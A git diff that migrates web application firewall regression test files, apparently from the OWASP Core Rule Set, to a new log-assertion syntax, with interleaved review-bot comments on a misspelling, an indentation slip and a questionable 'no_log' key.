@@ -4298,7 +4240,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4319,7 +4260,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4340,7 +4280,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4521,7 +4460,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4542,7 +4480,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4563,7 +4500,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4744,7 +4680,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4765,7 +4700,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4786,7 +4720,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4967,7 +4900,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -4988,7 +4920,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5009,7 +4940,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5190,7 +5120,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5211,7 +5140,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5232,7 +5160,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5413,7 +5340,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5434,7 +5360,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5455,7 +5380,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5636,7 +5560,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5657,7 +5580,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5678,7 +5600,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5859,7 +5780,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5880,7 +5800,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -5901,7 +5820,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -6082,7 +6000,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -6103,7 +6020,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -6124,7 +6040,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -6305,7 +6220,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -6326,7 +6240,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -6347,7 +6260,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -6528,7 +6440,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -6549,7 +6460,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
@@ -6570,7 +6480,6 @@ tests:
 method: "POST"
 uri: "/post"
 version: "HTTP/1.0"
- data: "test=value"
 output:
 log:
 expect_ids: [944300]
diff --git a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml
index bb4b5cf06..90685d508 100644
--- a/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml
+++ b/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml
@@ -87,4 +87,5 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: "
+ log:
+ match_regex: 'Inbound Anomaly Score Exceeded \(Total Score: '
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml
index 4e4c8ffd5..cf9e40a07 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951110"
 rule_id: 951110
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml
index df1498b4e..84bc18f98 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951120"
 rule_id: 951120
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml
index 2dee3e9fb..beb26bbef 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951130"
 rule_id: 951130
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml
index 1e9af862e..25fcdcf04 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951140"
 rule_id: 951140
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml
index ea77b7f80..c92333950 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951160"
 rule_id: 951160
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml
index a6ab7eada..85bcf4ac6 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951170"
 rule_id: 951170
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml
index ebbb20c6c..57f2cdc95 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951180"
 rule_id: 951180
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml
index 24570ba38..d717ef4f3 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951190"
 rule_id: 951190
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml
index 2a31214ec..ee8a31012 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951200"
 rule_id: 951200
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml
index 554fc98ef..28239707b 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951210"
 rule_id: 951210
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
index 37d8c78e1..b66b43f98 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit, Xhoenix"
- description: "Regression tests for rule 951220"
 rule_id: 951220
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
index 7663c5e82..ee66a9da0 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit, Xhoenix"
- description: "Regression tests for rule 951230"
 rule_id: 951230
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
index 720f5cae0..802915fd3 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit, Xhoenix"
- description: "Regression tests for rule 951240"
 rule_id: 951240
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml
index 321868202..ebc1c439d 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951250"
 rule_id: 951250
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
index e1e08b2dc..852a60793 100644
--- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 951260"
 rule_id: 951260
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
index 3fdccb669..18149c32e 100644
--- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
+++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "M4tteoP, Esad Cetiner, azurit"
- description: "Tests for rule 953100"
 rule_id: 953100
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml
index 698ea42ee..abb4ceb62 100644
--- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml
+++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "M4tteoP, Esad Cetiner, azurit"
- description: "Tests for rule 953101"
 rule_id: 953101
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml
index 4475c5935..ddcfda844 100644
--- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml
+++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "fzipi, azurit"
- description: "Positive tests for rule 953120"
 rule_id: 953120
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml
index 93c7d327a..fb954c0ef 100644
--- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml
+++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "Andrew Howe"
- description: "Tests for rule 954100"
 rule_id: 954100
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml
index 71366862c..f13c4f303 100644
--- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml
+++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml
@@ -1,7 +1,7 @@
 ---
 meta:
 author: "Felipe Zipitria, azurit"
- description: "Tests for rule 954120 - IIS Error information disclusure"
+ description: "IIS Error information disclusure"
 rule_id: 954120
 tests:
 - test_id: 1
diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml
index 7e9c13b50..eb0f78400 100644
--- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml
+++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml
@@ -1,7 +1,6 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 955100"
 rule_id: 955100
 tests:
 - test_id: 1
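Review bot: The rewritten `description` on the `+` line of the 954120.yaml hunk (`@@ -1,7 +1,7 @@`) carries the misspelling "disclusure" over from the line it replaces; since the value is being edited anyway, fix it in the same change: `description: "IIS Error information disclosure"`.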
diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml
index 699a250f3..4098fec7a 100644
--- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml
+++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml
@@ -1,7 +1,7 @@
 ---
 meta:
 author: "azurit"
- description: "Regression tests for rule 955260"
+rule_id: 955260
 tests:
 - test_id: 1
 desc: "Matching web shell Ru24PostWebShell. Our test infrastructure, currently, cannot run this test properly because of multiline output, so it's disabled."
diff --git a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml
index 08d07373a..1f1dbe8ab 100644
--- a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml
+++ b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml
@@ -67,4 +67,5 @@ tests:
 uri: "/reflect"
 data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}"
 output:
- log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: "
+ log:
+ match_regex: 'Outbound Anomaly Score Exceeded \(Total Score: '
diff --git a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml
index 44461a0e3..027c14df7 100644
--- a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml
+++ b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml
@@ -69,9 +69,9 @@ tests:
 uri: "/get"
 version: "HTTP/1.1"
 output:
- # Phase 5 rules are prone to a race condition when parsing log output.
+ # Phase 5 rules are prone to a race condition when parsing log output.
 # Retry the test once if it fails to work around this issue.
 # See https://github.com/coreruleset/go-ftw/issues/141.
 retry_once: true
 log:
- no_expect_ids: [980170]
+ no_expect_ids: [980170]
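Review bot: In the 955260.yaml hunk (`@@ -1,7 +1,7 @@`) the added line reads `+rule_id: 955260` with the key apparently at column 0, which would make `rule_id` a sibling of `meta:` instead of a child of it, whereas every other file in this series (951110.yaml onwards) keeps `rule_id` nested under `meta:` next to `author:`. If the collapsed whitespace is not misleading here, anything reading `meta.rule_id` would treat this file as having no rule id. Indent the line to match the others: `  rule_id: 955260`.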
diff --git a/tests/regression/tests/positivetest-light.yaml.skeleton b/tests/regression/tests/positivetest-light.yaml.skeleton
index 07edf93e4..408ddceb9 100644
--- a/tests/regression/tests/positivetest-light.yaml.skeleton
+++ b/tests/regression/tests/positivetest-light.yaml.skeleton
@@ -1,5 +1,4 @@
- - - test_id: 1
+ - test_id: 1
 desc: "Argument test includes keyword skeletonkeyword"
 stages:
 - input:
@@ -17,7 +16,8 @@
 version: "HTTP/1.0"
 data: "test=skeletonkeyword"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 2
 desc: "Argument name includes keyword skeletonkeyword"
@@ -37,7 +37,8 @@
 version: "HTTP/1.0"
 data: "skeletonkeyword=test"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 3
 desc: "Cookie test includes keyword skeletonkeyword"
@@ -58,7 +59,8 @@
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 4
 desc: "Cookie name includes keyword skeletonkeyword"
@@ -79,7 +81,8 @@
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 5
 desc: "Request header test includes keyword skeletonkeyword"
@@ -100,7 +103,8 @@
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 6
 desc: "XML attribute value includes keyword skeletonkeyword"
@@ -120,7 +124,8 @@
 version: "HTTP/1.0"
 data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 7
 desc: "XML element value includes keyword skeletonkeyword"
@@ -140,7 +145,8 @@
 version: "HTTP/1.0"
 data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 8
 desc: "Nested XML element value includes keyword skeletonkeyword"
@@ -160,7 +166,8 @@
 version: "HTTP/1.0"
 data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 9
 desc: "Content-Type text/plain includes keyword skeletonkeyword"
@@ -180,7 +187,8 @@
 version: "HTTP/1.0"
 data: "test=skeletonkeyword"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 10
 desc: "Content-Type application/json arg value includes keyword skeletonkeyword"
@@ -200,7 +208,8 @@
 version: "HTTP/1.0"
 data: "{\"test\": \"skeletonkeyword\"}"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 11
 desc: "Content-Type application/json arg name includes keyword skeletonkeyword"
@@ -220,4 +229,5 @@
 version: "HTTP/1.0"
 data: "{\"skeletonkeyword\": \"test\"}"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
diff --git a/tests/regression/tests/positivetest.yaml.skeleton b/tests/regression/tests/positivetest.yaml.skeleton
index 181a36af4..4391b960c 100644
--- a/tests/regression/tests/positivetest.yaml.skeleton
+++ b/tests/regression/tests/positivetest.yaml.skeleton
@@ -16,7 +16,8 @@
 version: "HTTP/1.0"
 data: "test=skeletonkeyword"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 2
 desc: "Argument name includes keyword skeletonkeyword"
@@ -36,7 +37,8 @@
 version: "HTTP/1.0"
 data: "skeletonkeyword=test"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 3
 desc: "Cookie test includes keyword skeletonkeyword"
@@ -57,7 +59,8 @@
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 4
 desc: "Cookie name includes keyword skeletonkeyword"
@@ -78,7 +81,8 @@
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 5
 desc: "Request header test includes keyword skeletonkeyword"
@@ -99,7 +103,8 @@
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 6
 desc: "XML element includes keyword skeletonkeyword"
@@ -119,7 +124,8 @@
 version: "HTTP/1.0"
 data: "<?xml version=\"1.0\"?><xml><skeletonkeyword attribute_name=\"attribute_value\">value</skeletonkeyword></xml>"
 output:
- no_log_contains: "id \"skeletonid\""
+ no_log:
+ expect_ids: [skeletonid]
 - test_id: 7
 desc: "XML attribute name includes keyword skeletonkeyword"
@@ -139,7 +145,8 @@
 version: "HTTP/1.0"
 data: "<?xml version=\"1.0\"?><xml><element skeletonkeyword=\"attribute_value\">element_value</element></xml>"
 output:
- no_log_contains: "id \"skeletonid\""
+ no_log:
+ expect_ids: [skeletonid]
 - test_id: 8
 desc: "XML attribute value includes keyword skeletonkeyword"
@@ -159,7 +166,8 @@
 version: "HTTP/1.0"
 data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 9
 desc: "XML element value includes keyword skeletonkeyword"
@@ -179,7 +187,8 @@
 version: "HTTP/1.0"
 data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 10
 desc: "Nested XML element value includes keyword skeletonkeyword"
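Review bot: The `@@ -119,7 +124,8 @@` and `@@ -139,7 +145,8 @@` hunks of positivetest.yaml.skeleton (tests 6 and 7, the two negative cases) replace `no_log_contains` with a `no_log:` block holding `expect_ids`, while the negative log assertion elsewhere in this series (980170.yaml) is spelled `log:` / `no_expect_ids:`. Unless the runner's schema really defines a `no_log` key, an unknown key is typically ignored rather than rejected, so every test generated from this template would lose its negative assertion and pass regardless of whether the rule fires on an XML element or attribute name. Suggest `log:` with `no_expect_ids: [skeletonid]` in both hunks, so the skeleton agrees with the hand-written tests.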
@@ -199,7 +208,8 @@
 version: "HTTP/1.0"
 data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 11
 desc: "Content-Type text/plain includes keyword skeletonkeyword"
@@ -219,7 +229,8 @@
 version: "HTTP/1.0"
 data: "test=skeletonkeyword"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 12
 desc: "Content-Type application/json arg value includes keyword skeletonkeyword"
@@ -239,7 +250,8 @@
 version: "HTTP/1.0"
 data: "{\"test\": \"skeletonkeyword\"}"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 13
 desc: "Content-Type application/json arg name includes keyword skeletonkeyword"
@@ -259,7 +271,8 @@
 version: "HTTP/1.0"
 data: "{\"skeletonkeyword\": \"test\"}"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 14
 desc: "Content-Type multipart/form-data json arg name includes keyword skeletonkeyword"
@@ -279,7 +292,8 @@
 version: "HTTP/1.0"
 data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 15
 desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword"
@@ -299,7 +313,8 @@
 version: "HTTP/1.0"
 data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 16
 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword"
@@ -319,7 +334,8 @@
 version: "HTTP/1.0"
 data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
 - test_id: 17
 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword"
@@ -339,4 +355,5 @@
 version: "HTTP/1.0"
 data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--"
 output:
- log_contains: "id \"skeletonid\""
+ log:
+ expect_ids: [skeletonid]
From a9e91f8c38a73fa8262d6db207e904fda69dbafb Mon Sep 17 00:00:00 2001
